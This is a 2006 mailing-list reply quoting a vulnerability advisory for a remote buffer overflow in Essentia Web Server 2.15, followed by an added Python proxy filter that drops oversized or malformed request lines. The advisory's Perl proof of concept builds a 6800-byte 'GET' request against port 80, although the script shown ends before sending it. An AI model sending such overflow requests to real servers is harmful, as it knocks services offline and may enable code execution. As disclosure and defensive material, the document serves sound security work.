
View Full Version : Re: [x0n3-h4ck]Essentia Web Server v.2.15 Buffer Overflow



Noam Rathaus
16/11/06, 02:41
Hi,

Very old news, http://www.securiteam.com/windowsntfocus/5QP0R156AC.html,
apparently it was never patched by the vendor.

On Friday 10 November 2006 18:57, corrado.liotta@alice.it wrote:
> -=[--------------------ADVISORY-------------------]=-
>
> Essentia Web Server V 2.15
>
> Author:CorryL x0n3-h4ck.org
> -=[-----------------------------------------------]=-
>
>
> -=[+] Application: Essentia Web Server
> -=[+] Version: 2.15
> -=[+] Vendor's URL: http://www.essencomp.com
> -=[+] Platform: Windows
> -=[+] Bug type: Buffer overflow
> -=[+] Exploitation: Remote
> -=[-]
> -=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~
> -=[+] Reference: www.x0n3-h4ck.org
> -=[+] Virtual Office: http://www.kasamba.com/CorryL
>
> ..::[ Description ]::..
>
> Providing enhanced Web Application and Communication Services, this is a
> high performance scalable web server that supports thousands of virtual
> servers.
>
> ..::[ Bug ]::..
>
> This software is affected by a buffer overflow
> that would allow an attacker to execute arbitrary code
> on the victim system.
> By sending a GET+Ax6800 request, he would succeed
> in writing above the SEH point.
>
> ..::[ Proof Of Concept ]::..
>
> #!/usr/bin/perl
>
> use IO::Socket;
> use Getopt::Std; getopts('h:', \%args);
>
> if (defined($args{'h'})) { $host = $args{'h'}; }
>
> print STDERR "\n-=[ Essentia Web Server 2.15 Remote DOS Exploit]=-\n";
> print STDERR "-=[ Discovered By CorryL corryl80@gmail.com ]=-\n";
> print STDERR "-=[ Coded by CorryL info:www.x0n3-h4ck.org ]=-\n\n";
>
> if (!defined($host)) {
>     Usage();
> }
>
> $dos = "A"x6800;
>
> print "[+] Connect to $host\n";
>
> $socket = new IO::Socket::INET (PeerAddr => "$host",
>                                 PeerPort => 80,
>                                 Proto => 'tcp');
>
> die unless $socket;
>
> print "[+] Sending DOS byte\n";
>
> $data = "GET /$dos \r\n\r\n";
>
>
> ..::[ Workaround ]::..
>
> nothing
>
> ..::[ Disclosure Timeline ]::..
>
> [30/10/2006] - Vendor notification
> [04/11/2006] - No Vendor Response
> [04/11/2006] - Public disclosure

--
  Noam Rathaus
  CTO
  1616 Anderson Rd.
  McLean, VA 22102
  Tel: 703.286.7725 extension 105
  Fax: 888.667.7740
  noamr@beyondsecurity.com
  http://www.beyondsecurity.com
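
A defensive filter for the condition described in the advisory quoted above, as an added example that is not part of the original post or of the advisory: with no vendor patch and no workaround listed, a proxy in front of the server can drop requests whose request-target is oversized or malformed before they reach it. The limits, method allow-list, function names and sample requests are assumptions constructed for illustration.

```python
import re

# Assumed policy values for a filter in front of the unpatched server (not from the advisory).
MAX_TARGET_LEN = 2048   # the advisory's request path is 6800 bytes
MAX_REPEAT_RUN = 256    # longest tolerated run of one repeated byte (filler heuristic)
_REPEAT = re.compile(rb"(.)\1{%d,}" % MAX_REPEAT_RUN, re.DOTALL)
_VERSION = re.compile(rb"HTTP/1\.[01]")
_METHODS = {b"GET", b"HEAD", b"POST", b"OPTIONS"}


def inspect_request(raw: bytes) -> list:
    """Return reasons to drop a raw HTTP request; an empty list means forward it."""
    line, crlf, _rest = raw.partition(b"\r\n")
    if not crlf:
        return ["request line not CRLF-terminated"]
    parts = line.split(b" ")
    if len(parts) != 3:
        return ["malformed request line"]
    method, target, version = parts
    reasons = []
    if method not in _METHODS:
        reasons.append("unexpected method")
    if len(target) > MAX_TARGET_LEN:
        reasons.append("request-target too long (%d bytes)" % len(target))
    if _REPEAT.search(target):
        reasons.append("long repeated-byte run in request-target")
    if not _VERSION.fullmatch(version):
        # The request in the advisory carries no HTTP version after the path.
        reasons.append("missing or invalid HTTP version")
    return reasons


# Constructed sample requests (not captured traffic).
SAMPLES = {
    "normal": b"GET /index.html HTTP/1.1\r\nHost: example.test\r\n\r\n",
    "advisory-shaped": b"GET /" + b"A" * 6800 + b" \r\n\r\n",
    "long-but-varied": b"GET /" + b"ab" * 1500 + b" HTTP/1.0\r\n\r\n",
}


def triage(samples=SAMPLES):
    """Map each sample name to its list of drop reasons."""
    return {name: inspect_request(raw) for name, raw in samples.items()}


if __name__ == "__main__":
    for name, reasons in triage().items():
        print(name, "->", "DROP: " + "; ".join(reasons) if reasons else "forward")
```

The length check is the control that matters; the repeated-byte and version checks only add context for whoever reviews the dropped requests.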